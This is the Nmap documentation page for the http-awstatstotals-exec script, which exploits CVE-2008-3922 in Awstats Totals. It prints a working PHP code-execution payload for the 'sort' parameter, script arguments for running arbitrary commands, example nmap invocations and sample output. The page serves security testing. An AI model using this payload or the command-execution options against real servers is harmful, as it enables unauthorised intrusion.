File http-awstatstotals-exec
Script types:
portrule
Categories:
vuln, intrusive, exploit
Download: http://nmap.org/svn/scripts/http-awstatstotals-exec.nse
User Summary
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:
?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}
Common paths for Awstats Total:
/awstats/index.php/awstatstotals/index.php/awstats/awstatstotals.php
References:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
- http://www.exploit-db.com/exploits/17324/
Script Arguments
http-awstatstotals-exec.uri
Awstats Totals URI including path. Default: /index.php
http-awstatstotals-exec.cmd
Command to execute. Default: whoami
http-awstatstotals-exec.outfile
Output file. If set it saves the output in this file.
Other useful args when running this script: http.useragent - User Agent to use in GET request
http-max-cache-size, http.pipeline, http.useragent
See the documentation for the http library.Example Usage
nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target> nmap -sV --script http-awstatstotals-exec.nse <target>
Script Output
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-awstatstotals-exec.nse: |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
Requires
Author: Paulino Calderon
License: Same as Nmap--See http://nmap.org/book/man-legal.html
